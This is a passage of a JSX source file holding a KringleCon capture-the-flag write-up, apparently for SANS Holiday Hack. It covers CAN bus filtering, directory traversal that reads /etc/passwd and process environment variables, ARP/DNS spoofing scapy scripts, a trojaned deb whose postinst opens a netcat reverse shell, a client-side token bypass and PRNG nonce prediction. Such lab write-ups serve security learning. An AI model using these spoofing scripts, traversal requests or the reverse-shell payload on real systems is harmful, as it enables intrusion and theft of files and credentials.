    this proved difficult. You found your way around the tool with the help of <span className="NPC-text">Alice Bluebird</span> and
    ultimately uncovered that <span className="NPC-text">The Lollipop Guild</span> was the adversary
    group which <span className="Red-fancy">Santa</span> feared would attack <span className="Red-fancy">KringleCon</span>.
  </p>
);

/* ---- OBJECTIVE 7 ---- */
const CANDBUS_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    Now that the emergency has been taken care of, you collect yourself and begin to explore
    the castle with your new pair of <span className="Red-fancy">Santa</span> eyes. You start
    helping out the <span className="NPC-text">elves</span> with things that you were not
    authorized to access as a mere cactus. The ultimate privilege escalation! On the roof,
    you find that the <span className="NPC-text">CAN bus</span> attached to your sled has
    been tampered with and is being sent malicious codes. You have to find a way to create
    exclusion rules to mitigate these malicious codes from the bus.
  </p>
);
const CANDBUS_SOLUTION_1 = (
  <p className="Narrator-block">
    The strategy for this one is to create exclusion rules for each different component
    so you can isolate accelerator, brake, and steering separately. Here are some good rules to start off with:
  </p>
);
const CANDBUS_SOLUTION_2 = (
  <p className="Narrator-block">
    After doing this, we can see that a unique message keeps getting output
    without any changes to the acceleration, brake, steering, or locking. We
    can exclude this message:
  </p>
);
const CANDBUS_SOLUTION_3 = (
  <p className="Narrator-block">
    Now that there are no codes being output, we can start removing each one of
    the <code>All</code> exclusions one at a time to determine what each distinct code
    means, and which codes are being maliciously inserted.
  </p>
);
const CANDBUS_SOLUTION_4 = (
  <p className="Narrator-block">
    From messing with these exclusion rules, you will see that if you do not
    exclude brakes ID <code>#080</code>, and you turn the brake up, that it
    prints out both a positive and negative value. This does not seem right, as
    it should probably only be a positive number. We can add an exclusion rule
    for this:
  </p>
);
const CANDBUS_SOLUTION_5 = (
  <p className="Narrator-block">
    These two rules end up satisfying the challenge after the other exclusion
    rules are removed.
  </p>
);
const CANDBUS_FINAL = (
  <p className="Text-block">
    You isolated the problems to a steady stream of malicious codes and tampering
    specific to when the brakes are applied. This was a great catch on your part. Who knows,
    someone may have been hurt if <span className="Red-fancy">Santa</span> attempted to operate
    the sled with faulty brakes... Who would do something like this?
  </p>
);

const CANDBUS_CODES_1_SNIPPET = (
  "ID #244 | Operator: All\n"
  + "ID #080 | Operator: All\n"
  + "ID #019 | Operator: All\n"
  + "ID #188 | Operator: All"
);
const CANDBUS_CODES_1 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={CANDBUS_CODES_1_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const CANDBUS_CODES_2_SNIPPET = "ID #19B | Operator: Equals | Criterion: 0000000F2057"
const CANDBUS_CODES_2 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={CANDBUS_CODES_2_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const CANDBUS_CODES_3_SNIPPET = (
  "Legend\n"
  + "------\n"
  + "Start: 02A#00FF00\n"
  + "Stop: 02A#0000FF\n"
  + "Lock: 19B#000000000000\n"
  + "Unlock: 19B#00000F000000\n"
  + "Speed: 244#xxxxxxxxxx\n"
  + "Steering: 019#xxxxxxxx\n"
  + "Brake: 080#xxxxxx\n"
  + "\n"
  + "Some online research shows that ID 188, which is also present in CAN-D-BUS,\n"
  + "is normally assocaited with turn signals. In this case, it is always 0x0."
);
const CANDBUS_CODES_3 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={CANDBUS_CODES_3_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const CANDBUS_CODES_4_SNIPPET = (
  "ID #19B | Operator: Equals | Criterion: 0000000F2057\n"
  + "ID #080 | Operator: Less | Criterion: 000000000000"
);
const CANDBUS_CODES_4 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={CANDBUS_CODES_4_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);

/* ---- OBJECTIVE 8 ---- */
const TAG_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    Some more exploring, and you happen upon the <span className="NPC-text">Wrapping Room</span> where
    you now have access to the <span className="NPC-text">Tag Generator</span> which <span className="NPC-text">Noel Boetie</span> lets
    you know is "<span className="NPC-text">acting up</span>". Putting your skills back to use,
    you try to figure out the issue.
  </p>
);
const TAG_SOLUTION_1 = (
  <p className="Narrator-block">
    Given some hints collected, it appears that the tag generator application has had some “improvements” made from the
    greeting card application which make it vulnerable. The hints indicate that it has something to do with the upload
    function. The first thing to try is uploading something other than an image in order to see what happens. You can use
    Burp to carefully look at the requests and response, showing that there are two API endpoints at play <code>/upload</code> and <code>/image</code>,
    but even using the application’s UI will do just fine for this. I opted to use <code>curl</code> to craft my requests to
    the <code>/upload</code> endpoint. The APIs and parameters can be found in the DOM as well:
  </p>
);
const TAG_TERMINAL_1 = (
  <div className="Terminal-block" id="termynal6" data-termynal>
    <span data-ty="input">curl -X POST -F "my_file[]=@/home/elveskevtar/test.txt" "https://tag-generator.kringlecastle.com/upload"</span>
    <span data-ty>Something went wrong!</span>
    <span data-ty></span>
    <span data-ty>Error in <span className="NPC-text">/app/lib/app.rb</span>: Unsupported file type: <span className="NPC-text">/tmp/RackMultipart20210102-1-gejijb.txt</span></span>
  </div>
);
const TAG_SOLUTION_2 = (
  <p className="Narrator-block">
    If you try something similar with the application’s UI, you will see this error message appear on screen. Now we know
    two things, 1) the absolute path of the ruby application’s source and 2) probably where the <code>/image</code> API endpoint is
    looking for the images that have been uploaded. We can first test to see if there is a directory traversal vulnerability by
    modifying the <code>id</code> parameter to see if we can pull files outside of the directory the application is searching for images. If
    we use <code>curl</code> we should be able to pull non-images if the application does not do validation in the backend for this:
  </p>
);
const TAG_TERMINAL_2 = (
  <div className="Terminal-block" id="termynal7" data-termynal>
    <span data-ty="input">curl "https://tag-generator.kringlecastle.com/image?<span className="NPC-text">id=../app/lib/app.rb"</span></span>
    <span data-ty># encoding: ASCII-8BIT</span>
    <span data-ty></span>
    <span data-ty><span className="NPC-text">TMP_FOLDER = '/tmp'</span></span>
    <span data-ty><span className="NPC-text">FINAL_FOLDER = '/tmp'</span></span>
    <span data-ty>...</span>
    <span data-ty><span className="tab" /><span className="tab" /><span className="tab" /><span className="tab" /># I wonder what this will do? --Jack</span>
    <span data-ty><span className="tab" /><span className="tab" /><span className="tab" /><span className="tab" /># if entry.name !~ /^[a-zA-Z0-9._-]+$/</span>
    <span data-ty><span className="tab" /><span className="tab" /><span className="tab" /><span className="tab" /># <span className="tab" />raise 'Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen'</span>
    <span data-ty><span className="tab" /><span className="tab" /><span className="tab" /><span className="tab" /># end</span>
    <span data-ty>...</span>
  </div>
);
const TAG_SOLUTION_3 = (
  <p className="Narrator-block">
    Looks like the first try worked and there are a few interesting things we can observe from this application.
  </p>
);
const TAG_SOLUTION_3_1 = (
  <ol type="1">
    <li>
      The temp folder and final folder that uploads are sent to are the same, located at <code>/tmp</code>, but even if the final
      folder happened to be different, we could have just kept appending <code>../</code> to the beginning of the parameter until
      we escaped all the way back to <code>/</code> the root directory.
    </li>
    <li>
      The most obvious changes in this source code is that the filename validation for the <code>/image</code> endpoint and for
      files sent through <code>/upload</code>, specifically those in zip format, are commented out. This will enable us to perform
      Remote Code Execution (RCE) in the second solution to this objective; however, there is a much simpler solution.
    </li>
    <li>
      For <code>/image</code> they are not only not escaping/validating the filename, but also not validating that the application is
      exposing files that it should not, both things that it should be doing. However, since they are not,
      we are able to exploit this directory traversal vulnerability.
    </li>
  </ol>
);
const TAG_SOLUTION_3_2 = (
  <p className="Narrator-block">
    Knowing this information, we can do a little bit of Googling to figure out if there is any common file where the
    environment variables might be stored. My initial thought would have been either the primary user's <code>.bashrc</code> or <code>.bash_profile</code> or
    perhaps somewhere in the ruby application's file structure.
  </p>
);
const TAG_TERMINAL_3 = (
  <div className="Terminal-block" id="termynal8" data-termynal>
    <span data-ty="input">curl "https://tag-generator.kringlecastle.com/image?id=<span className="NPC-text">../etc/passwd"</span></span>
    <span data-ty>root:x:0:0:root:/root:/bin/bash</span>
    <span data-ty>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
    <span data-ty>bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
    <span data-ty>sys:x:3:3:sys:/dev:/usr/sbin/nologin</span>
    <span data-ty>sync:x:4:65534:sync:/bin:/bin/sync</span>
    <span data-ty>games:x:5:60:games:/usr/games:/usr/sbin/nologin</span>
    <span data-ty>man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span>
    <span data-ty>lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span>
    <span data-ty>mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span>
    <span data-ty>news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span>
    <span data-ty>uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span>
    <span data-ty>proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span>
    <span data-ty>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span>
    <span data-ty>backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span>
    <span data-ty>list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span>
    <span data-ty>irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span>
    <span data-ty>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span>
    <span data-ty>nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span>
    <span data-ty>_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</span>
    <span data-ty><span className="NPC-text">app</span>:x:1000:1000:,,,:/home/app:/bin/bash</span>
  </div>
);
const STACKEXCHANGE_PROC = "https://unix.stackexchange.com/questions/29128/how-to-read-environment-variables-of-a-process";
const TAG_SOLUTION_4 = (
  <p className="Narrator-block">
    We can find out the users running on the machine by printing out <code>/etc/passwd</code> and we notice that there is an <code>app</code> user
    which looks promising. We can pull the <code>.bashrc</code> but there is nothing interesting other than some small edit which
    another person, who likely achieved RCE, added to the file. After more Googling and more attempts at finding this flag while
    working blind (not being able to list directory contents), I stumbled upon this <a href={STACKEXCHANGE_PROC}>StackExchange post</a> showing
    that <code>/proc/&#60;pid&#62;/environ</code> might be where the process’s environment variables are stored. Although we may not know the
    process id of the application, we can use <code>/proc/self/environ</code> to print out the current running process’s environment
    variables; this should work since the ruby application will be accessing the file!
  </p>
);
const TAG_TERMINAL_4 = (
  <div className="Terminal-block" id="termynal9" data-termynal>
    <span data-ty="input">curl "https://tag-generator.kringlecastle.com/image?id=<span className="NPC-text">../proc/self/environ</span>" --output -</span>
    <span data-ty>PATH=/usr/local/bundle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin HOSTNAME=cbf2810b7573 RUBY_MAJOR=2.7 RUBY_VERSION=2.7.0 RUBY_DOWNLOAD_SHA256=27d350a52a02b53034ca0794efe518667d558f152656c2baaf08f3d0c8b02343 GEM_HOME=/usr/local/bundle BUNDLE_SILENCE_ROOT_WARNING=1 BUNDLE_APP_CONFIG=/usr/local/bundle APP_HOME=/app PORT=4141 HOST=0.0.0.0 <span className="NPC-text">GREETZ=JackFrostWasHere</span> HOME=/home/app %</span>
  </div>
);
const TAG_SOLUTION_5 = (
  <p className="Narrator-block">
    And viola! The <code>GREETZ</code> environment variable is set to <code>JackFrostWasHere</code>. We can also do some more fun things with
    this vulnerability such as print out the Linux distribution being used for this machine by pulling the <code>/proc/version</code> file.
  </p>
);
const TAG_FINAL = (
  <p className="Text-block">
    After some digging, you discovered multiple vulnerabilities in the <span className="NPC-text">Tag Generator</span>:
    both arbitrary file access through directory traversal and remote code execution. The
    environment variables show that <span className="NPC-text">Jack Frost</span> has already
    found these vulnerabilities and is likely the culprit who tampered with the software.
    Could he have also been the reason for the strange happenings around here? The sled,
    the weird <span className="Red-fancy">Santa</span> impersonation, the blockchain modification
    you have been hearing so much about? Only time will tell.
  </p>
);

/* ---- OBJECTIVE 9 ---- */
const ARP_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    Back on the roof, it seems like the <span className="NPC-text">elves</span> have discovered
    that someone has taken over a server containing important meeting minutes for a board meeting
    regarding <span className="Red-fancy">Kringle Castle</span>. You have a strong suspicion
    that <span className="NPC-text">Jack Frost</span> is behind this. You go ahead and attempt
    a man-in-the-middle attack to regain access of the host.
  </p>
);
const TMUX_CHEATSHEET = "https://tmuxcheatsheet.com/";
const ARP_SOLUTION_1 = (
  <p className="Narrator-block">
    It looks like Jack Frost has hijacked the host at 10.6.6.35 with some custom malware.
    We need to help the <span className="Red-fancy">North Pole</span> by getting command line access back to this host. We will
    end up needing more terminals which we can create with <code>tmux split-window -hb</code>.
    Take a look at the <a href={TMUX_CHEATSHEET}>tmux cheatsheet</a> for how to swap between
    terminals and more great tmux controls. First, we should start by getting a <code>tcpdump</code> to
    see what types of packets are being sent.
  </p>
);
const ARP_TERMINAL_1 = (
  <div className="Terminal-block" id="termynal10" data-termynal>
    <span data-ty="input"><span className="NPC-text">tcpdump -nni eth0</span></span>
    <span data-ty>tcpdump: verbose output suppressed, use -v or -vv for full protocol decode</span>
    <span data-ty>listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes</span>
    <span data-ty>22:22:17.821602 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28</span>
    <span data-ty>22:22:18.853617 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28</span>
    <span data-ty>22:22:19.889571 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28</span>
    <span data-ty>22:22:20.929615 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28</span>
    <span data-ty>4 packets captured</span>
    <span data-ty>4 packets received by filter</span>
    <span data-ty>0 packets dropped by kernel</span>
  </div>
);
const ARP_SOLUTION_2 = (
  <p className="Narrator-block">
    We can see some ARP requests are being sent and the hints are strongly
    suggesting that we have to spoof the response. We are
    given a helpful script in <code>scripts/arp_resp.py</code> which we can
    use with the <span className="NPC-text">scapy</span> module to have the ARP
    requests resolve to the MAC address of our NIC. From here we will hopefully
    see any followup requests being sent from the machine
    which <span className="NPC-text">Jack Frost</span> has hijacked.
  </p>
);
const ARP_SPOOF_SNIPPET = (
  "### Update scripts/arp_resp.py\n"
  + "def handle_arp_packets(packet):\n"
  + "\t# if arp request, then we need to fill this out to send back our mac as the response\n"
  + "\tif ARP in packet and packet[ARP].op == 1:\n"
  + "\t\tether_resp = Ether(dst=packet.dst, type=0x806, src=macaddr)\n"
  + "\t\t\n"
  + "\t\tarp_response = ARP(pdst=packet[ARP].pdst)\n"
  + "\t\tarp_response.op = \"is-at\"\n"
  + "\t\tarp_response.plen = packet[ARP].plen\n"
  + "\t\tarp_response.hwlen = packet[ARP].hwlen\n"
  + "\t\tarp_response.ptype = packet[ARP].ptype\n"
  + "\t\tarp_response.hwtype = packet[ARP].hwtype\n"
  + "\t\t\n"
  + "\t\tarp_response.hwsrc = macaddr\n"
  + "\t\tarp_response.psrc = \"10.6.6.53\"\n"
  + "\t\tarp_response.hwdst = packet[ARP].hwdst\n"
  + "\t\tarp_response.pdst = packet[ARP].pdst\n"
  + "\t\t\n"
  + "\t\tresponse = ether_resp/arp_response\n"
  + "\t\tsendp(response, iface=\"eth0\")"
);
const ARP_SPOOF = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={ARP_SPOOF_SNIPPET}
    language={"python"}
    theme={dracula}
    showLineNumbers={false} />
);
const ARP_SOLUTION_3 = (
  <p className="Narrator-block">
    After updating the script, we can now run it to respond to the ARP request and
    it should resolve to our MAC address. We start by running <code>tcpdump</code> on
    one of the tmux screens and then running our script in another screen.
  </p>
);
const ARP_TERMINAL_2 = (
  <div className="Terminal-block" id="termynal11" data-termynal>
    <span data-ty="input">python3 scripts/arp_resp.py</span>
    <span data-ty>.</span>
    <span data-ty>Sent 1 packets.</span>
  </div>
);
const ARP_OUTPUT_SNIPPET = (
  "### On the other screen w/ tcpdump running\n"
  + "...\n"
  + "23:20:01.713517 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28\n"
  + "23:20:01.757625 ARP, Reply 10.6.6.53 is-at 02:42:0a:06:00:02, length 28\n"
  + "23:20:01.786189 IP 10.6.6.35.32873 > 10.6.6.53.53:0+ A? ftp.osuosl.org. (32)\n"
  + "23:20:02.773635 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28\n"
  + "23:20:03.825579 ARP, Request who-has 10.6.6.53 tell 10.6.6.35, length 28"
);
const ARP_OUTPUT = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={ARP_OUTPUT_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const ARP_SOLUTION_4 = (
  <p className="Narrator-block">
    It looks like our reply has worked since the machine has made a DNS request
    seen from the IP packet requesting <code>ftp.osuosl.org</code>. From here it
    should not be too difficult to reply to the DNS request and have it resolve
    to our own IP address. We are also given a script for this purpose.
  </p>
);
const DNS_SPOOF_SNIPPET = (
  "### Update scripts/dns_resp.py\n"
  + "\n"
  + "# destination ip we arp spoofed\n"
  + "ipaddr_we_arp_spoofed = \"10.6.6.53\"\n"
  + "\n"
  + "def handle_dns_request(packet):\n"
  + "\t# Need to change mac addresses, Ip Addresses, and ports below.\n"
  + "\t# We also need\n"
  + "\teth = Ether(src=macaddr, dst=packet.src)   # need to replace mac addresses\n"
  + "\tip  = IP(dst=packet[IP].src, src=packet[IP].dst)  # need to replace IP addresses\n"
  + "\tudp = UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)  # need to replace ports\n"
  + "\tdns = DNS(\n"
  + "\t\tqr=1, aa=1,\n"
  + "\t\tid=packet[DNS].id,\n"
  + "\t\tqd=packet[DNS].qd,\n"
  + "\t\tan=DNSRR(rrname=packet[DNS].qd.qname, rdata=ipaddr)\n"
  + "\t)\n"
  + "\tdns_response = eth / ip / udp / dns\n"
  + "\tsendp(dns_response, iface=\"eth0\")"
);
const DNS_SPOOF = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={DNS_SPOOF_SNIPPET}
    language={"python"}
    theme={dracula}
    showLineNumbers={false} />
);
const ARP_TERMINAL_3 = (
  <div className="Terminal-block" id="termynal12" data-termynal>
    <span data-ty><span className="NPC-text">### 1. Run tcpdump in a screen</span></span>
    <span data-ty="input">tcpdump -nni eth0</span>
    <span data-ty><span className="NPC-text">### 2. Run scripts/dns_resp.py in a screen</span></span>
    <span data-ty="input">python3 scripts/dns_resp.py</span>
    <span data-ty><span className="NPC-text">### 3. Run scripts/arp_resp.py in a screen</span></span>
    <span data-ty="input">python3 scripts/arp_resp.py</span>
  </div>
);
const ARP_SOLUTION_5 = (
  <p className="Narrator-block">
    We see that both the arp and dns spoofing scripts have sent a packet
    and that a stream of IP packets has been received. There is a request to
    port 80 indicating an HTML request which we can intercept if we start
    a web server. Let's repeat the same steps but with an http server running
    in the background.
  </p>
);
const ARP_TERMINAL_4 = (
  <div className="Terminal-block" id="termynal13" data-termynal>
    <span data-ty="input">python3 -m http.server 80</span>
    <span data-ty>Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...</span>
    <span data-ty>10.6.6.35 - - [16/Dec/2020 01:17:08] code 404, message File not found</span>
    <span data-ty>10.6.6.35 - - [16/Dec/2020 01:17:08] <span className="NPC-text">"GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 404</span> -</span>
  </div>
);
const LINUX_TROJAN_LINK = "http://www.wannescolman.be/?p=98";
const ARP_SOLUTION_6 = (
  <p className="Narrator-block">
    We can see the HTTP GET request! The machine is attempting to pull a <code>deb</code> package
    which it likely installs after downloading. See <a href={LINUX_TROJAN_LINK}>Wannes
    Colman's blog post</a> on creating a Linux trojan which outlines how to craft a malicious
    debian package. First, we can extract one of the existing packages we are given
    with <code>dpkg -x &#60;somepackage.deb&#62; dest_folder</code>. Then we can create
    our <code>control</code> file and add have our payload execute through the <code>postinst</code> file.
    The blog post gives an example of creating a payload with metasploit but, in our case,
    it is much easier to use a simple <code>netcat</code> reverse shell.
  </p>
);
const POSTINST_SNIPPET = (
  "#!/bin/sh\n"
  + "set -e\n"
  + "if [ \"$1\" = \"configure\" ] && [ -x \"`which update-mime 2> /dev/null`\" ]; then\n"
  + "\tupdate-mime\n"
  + "fi\n"
  + "nc -e /bin/sh 10.6.0.2 4848"
);
const POSTINST = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={POSTINST_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const ARP_SOLUTION_7 = (
  <p className="Narrator-block">
    Finally, we can run <code>nc -lvp 4848</code> on a separate tmux screen to listen
    for the reverse shell. We can also <code>mkdir -p pub/jfrost/backdoor</code> from the
    root of wherever we are running our webserver. Then we can repackage our <code>deb</code> file
    with <code>dpkg-deb --build dest_folder</code> and move and rename this
    to <code>suriv_amd64.deb</code> so that it is pulled when the target machine sends the
    request. If we run the steps to spoof the ARP and DNS responses again with the webserver
    and our <code>netcat</code> listener running, we find ourselves with a successful reverse
    shell in the hijacked machine! We can <code>cat NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt</code> in
    order to find out that <span className="Red-fancy">Tanta Kringle</span> was the one who
    recused herself from the vote. Let's break down what happened here as there are a few moving parts.
  </p>
);
const ARP_SOLUTION_8 = (
  <ol type="1">
    <li>
      The hijacked machine is sending out ARP <code>who-has</code> requests to determine
      the MAC address for <code>10.6.6.53</code>
    </li>
    <li>
      Our ARP response script waits for one of these packets, and spoofs a reply with
      our MAC address mapped to that IP address
    </li>
    <li>
      The hijacked machine receives our spoofed ARP <code>is-at</code> reply and sends
      a DNS request for the FTP server <code>ftp.osuosl.org</code>
    </li>
    <li>
      Our DNS response script waits for this DNS request and then spoofs the response
      to resolve this domain to our IP address
    </li>
    <li>
      The hijacked machine receives our spoofed DNS reply and makes a <code>GET</code> request
      to the resolved IP address (our IP address) for <code>/pub/jfrost/backdoor/suriv_amd64.deb</code>
    </li>
    <li>
      We have staged a malicious debian package with this relative path from the root of
      a simple python webserver; our webserver successfully returns this package
    </li>
    <li>
      The hijacked machine attempts to install this package that it has just pulled from
      our webserver and the <code>postinst</code> file starts a <code>netcat</code> reverse
      shell; we have a <code>netcat</code> listener setup to establish this connection
    </li>
    <li>
      Finally, we have gained access to the machine and can print the meeting minutes and
      run any commands on the machine.
    </li>
  </ol>
);
const ARP_FINAL = (
  <p className="Text-block">
    It took some carefully spoofed packets and a maliciously crafted debian package, but you
    finally manage to obtain a shell into the commandeered host. In the meeting minutes file,
    you see that <span className="Red-fancy">Tanta Kringle</span> was the one who recused
    herself of the vote because of her relationship with <span className="Red-fancy">Kris Kringle</span>.
    It looks like some might have interpreted this as a conflict of interest.
  </p>
);

/* ---- OBJECTIVE 10 ---- */
const FINGERPRINT_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    So much time spent as <span className="Red-fancy">Santa</span> is actually making you miss
    your old prickly self. You go back to the mural near the entrance and go through the
    painting to find yourself back in the invisible maze as a pink cactus. Once you make it out,
    you have a strange urge to try and bypass the fingerprint necessary to get to <span className="Red-fancy">Santa's Office</span>.
  </p>
);
const FINGERPRINT_SOLUTION_1 = (
  <p className="Narrator-block">
    Inspecting the <code>app.js</code> source in the Chrome developer console shows how to complete this challenge:
  </p>
);
const FINGERPRINT_CODE1_SNIPPET = (
  "...\n"
  + "const getParams = __PARSE_URL_VARS__();\n"
  + "let tokens = (getParams.tokens || '').split(',');\n"
  + "document.body.classList = tokens.join(' ');\n"
  + "// document.body.classList = [ ...tokens, 'open' ].join(' ');\n"
  + "const hasToken = name => tokens.indexOf(name) !== -1;\n"
  + "...\n"
  + "...\n"
  + "const handleBtn4 = () => {\n"
  + "\tconst cover = document.querySelector('.print-cover');\n"
  + "\tcover.classList.add('open');\n\n"
  + "\tcover.addEventListener('click', () => {\n"
  + "\t\tif (btn4.classList.contains('powered') && hasToken('besanta')) {\n"
  + "\t\t\t$.ajax({\n"
  + "\t\t\t\ttype: 'POST',\n"
  + "\t\t\t\turl: POST_URL,\n"
  + "\t\t\t\tdataType: 'json',\n"
  + "\t\t\t\tcontentType: 'application/json',\n"
  + "\t\t\t\tdata: JSON.stringify({\n"
  + "\t\t\t\t\ttargetFloor: '3',\n"
  + "\t\t\t\t\tid: getParams.id,\n"
  + "\t\t\t\t}),\n"
  + "\t\t\t\tsuccess: (res, status) => {\n"
  + "\t\t\t\t\tif (res.hash) {\n"
  + "\t\t\t\t\t\t__POST_RESULTS__({\n"
  + "\t\t\t\t\t\t\tresourceId: getParams.id || '1111',\n"
  + "\t\t\t\t\t\t\thash: res.hash,\n"
  + "\t\t\t\t\t\t\taction: 'goToFloor-3',\n"
  + "\t\t\t\t\t\t});\n"
  + "\t\t\t\t\t}\n"
  + "\t\t\t\t}\n"
  + "\t\t\t});\n"
  + "\t\t} else {\n"
  + "\t\t\t__SEND_MSG__({\n"
  + "\t\t\t\ttype: 'sfx',\n"
  + "\t\t\t\tfilename: 'error.mp3',\n"
  + "\t\t\t});\n"
  + "\t\t}\n"
  + "\t});\n"
  + "};\n"
  + "..."
);
const FINGERPRINT_CODE1 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={FINGERPRINT_CODE1_SNIPPET}
    language={"javascript"}
    theme={dracula}
    showLineNumbers={false} />
);
const FINGERPRINT_SOLUTION_2 = (
  <p className="Narrator-block">
    I’ve only included the relevant parts of the script to show that it looks like the fingerprint is being checked by a
    tokens variable having <code>besanta</code> as an argument. This tokens appears to be a mapping of the URL query parameters. I
    tried refreshing the page after adding <code>&#38;tokens=besanta</code> to the end of the URL but this does not work since these tokens are
    present once you get into the elevator buttons screen and refreshing the page just brings you back to the elevator.
  </p>
);
const FINGERPRINT_SOLUTION_3 = (
  <p className="Narrator-block">
    After inspecting the HTML from within the Chrome developer console, I realized that the elevator buttons module was
    being shown through an iframe:
  </p>
);
const FINGERPRINT_CODE2_SNIPPET = (
  "...\n"
  + "<iframe title=\"challenge\" src=\"https://elevator.kringlecastle.com?challenge=santamode-elevator&id=c8eec2a0-6c8c-4de7-9d26-61ca10f4a7ea&username=kevtar&area=santamode-santavator1&location=1,2&tokens=workshop-button,marble,portals,nut,candycane,elevator-key,redlight,nut2,ball,yellowlight,greenlight\n"
  + "..."
);
const FINGERPRINT_CODE2 = (
  <CodeBlock
    customStyle={CODE_BLOCK_STYLE}
    text={FINGERPRINT_CODE2_SNIPPET}
    language={"text"}
    theme={dracula}
    showLineNumbers={false} />
);
const FINGERPRINT_SOLUTION_4 = (
  <p className="Narrator-block">
    We can just change the <code>src</code> and append <code>,besanta</code> to the end of the tokens URL parameter and click the fingerprint
    sensor to solve this objective. There is also another way of solving this by removing the <code>hasToken('besanta')</code> check from <code>app.js</code> in
    the Chrome developer tools and then clicking the fingerprint scanner.
  </p>
);

/* ---- OBJECTIVE 11A ---- */
const BLOCKCHAIN_INTRODUCTION = (
  <p className="Text-block"><span className="tab" />
    You've made it up to <span className="Red-fancy">Santa's Office</span> as a cactus!
    The <span className="NPC-text">elves</span> on the floor look somewhat confused as to
    how you managed to make it onto the floor; however, after explaining, they seem to find
    it amusing. You see the <span className="Red-fancy">Naughty/Nice Blockchain</span> sitting
    on the table but the <span className="NPC-text">elves</span> will not let you inspect it
    unless you are <span className="Red-fancy">The Santa</span>. Good thing you know how to
    impersonate him! You come back up as <span className="Red-fancy">Santa</span> and begin
    investigating how <span className="NPC-text">Jack Frost</span> altered the blockchain.
  </p>
);
const TLISTON_TALK = "https://www.youtube.com/watch?v=Jo5Nlbqd-Vg&ab_channel=KringleCon";
const TLISTON_REPO = "https://github.com/tliston/mt19937";
const MTP_REPO = "https://github.com/kmyk/mersenne-twister-predictor";
const BLOCKCHAIN_SOLUTION_1 = (
  <p className="Narrator-block">
    We are in a situation where a psuedo random number generator (PRNG) has produced the
    nonce values for the blocks in the blockchain. If we have a few hundred generated nonces,
    then we might be able to predict the following nonces which have not even been generated
    yet since PRNGs are deterministic functions. We can make an assumption that the PRNG function
    being used is the Mersenne Twister 19937 function; this was included in one of the <a href={TLISTON_TALK}>talks</a>.
    We could use Tom Listen's <a href={TLISTON_REPO}>python module</a> for cloning MT19937 PRNGs;
    however, this script was built for 32-bit integer generation. We could modify the script to
    clone MT19937 for 64-bit integers, but I opted for using an existing python module which
    already has this functionality. See package <a href={MTP_REPO}>mersenne-twister-predictor</a>.
  </p>
);
const BLOCKCHAIN_SOLUTION_2 = (
  <p className="Narrator-block">
    To solve this, we can install this MT19937 predictor package, load the last 624 nonce
    values from the blockchain, and then feed these into the predictor. If the nonces were
    generated with the MT19937 PRNG, then we should be able to generate the next 4 values
    from the mersenne twister function to get the 130000th nonce of this blockchain.
  </p>
);
const BLOCKCHAIN_TERMINAL_1 = (
  <div className="Terminal-block" id="termynal14" data-termynal>
    <span data-ty="input">pip install <span className="NPC-text">mersenne-twister-predictor</span></span>
    <span data-ty>Collecting mersenne-twister-predictor</span>
    <span data-ty>  Downloading mersenne_twister_predictor-0.0.4-py3-none-any.whl (4.2 kB)</span>
    <span data-ty>Installing collected packages: mersenne-twister-predictor</span>
    <span data-ty>Successfully installed mersenne-twister-predictor-0.0.4</span>
    <span data-ty="input">python</span>
    <span data-ty>Python 3.6.12 (default, Dec 15 2020, 22:36:35)</span>
    <span data-ty>Type "help", "copyright", "credits" or "license" for more information.</span>
    <span data-ty="input" data-ty-prompt=">>>">from naughty_nice import Chain</span>
    <span data-ty="input" data-ty-prompt=">>>">chain = Chain(load=True, filename='blockchain.dat')</span>
